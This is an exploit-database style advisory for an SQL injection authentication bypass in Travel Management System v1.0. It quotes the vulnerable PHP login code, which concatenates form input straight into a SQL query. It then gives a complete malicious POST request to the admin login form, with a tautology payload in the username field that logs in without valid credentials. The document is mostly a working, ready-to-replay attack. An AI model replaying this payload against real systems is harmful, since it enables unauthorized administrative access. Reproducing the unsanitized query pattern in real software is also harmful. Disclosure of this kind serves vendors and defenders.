# Exploit Title: Travel Management System v1.0 - SQLi Authentication Bypass # Exploit Author: Adeeb Shah (@hyd3sec) and Bobby Cooke (boku) # Date: August 10, 2020 # Vendor Homepage: https://www.projectsworld.in # Software Link: https://projectworlds.in/wp-content/uploads/2019/06/travel.zip # Version: 1.0 # Tested On: Windows 10 (x64_86) + XAMPP 7.4.4 # Vulnerable Source Code if(isset($_POST["sbmt"])) { $cn=makeconnection(); $s="select * from users where Username='" . $_POST["t1"] . "' and Pwd='" . $_POST["t2"] ."'"; $q=mysqli_query($cn,$s); $r=mysqli_num_rows($q); $data=mysqli_fetch_array($q); mysqli_close($cn); if($r>0) { $_SESSION["Username"]= $_POST["t1"]; $_SESSION["usertype"]=$data[2]; $_SESSION['loginstatus']="yes"; header("location:index.php"); } else { echo ""; } } ?> # Malicious POST Request to /travel/admin/loginform.php HTTP/1.1 POST /travel/admin/loginform.php HTTP/1.1 Host: 192.168.222.135 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.222.135/travel/admin/loginform.php Content-Type: application/x-www-form-urlencoded Content-Length: 42 Connection: close Cookie: PHPSESSID=n4g0c99qju1miu1dudci67bkjb Upgrade-Insecure-Requests: 1 t1='+or+'1'%3d'1'%23&t2=hyd3sec&sbmt=LOGIN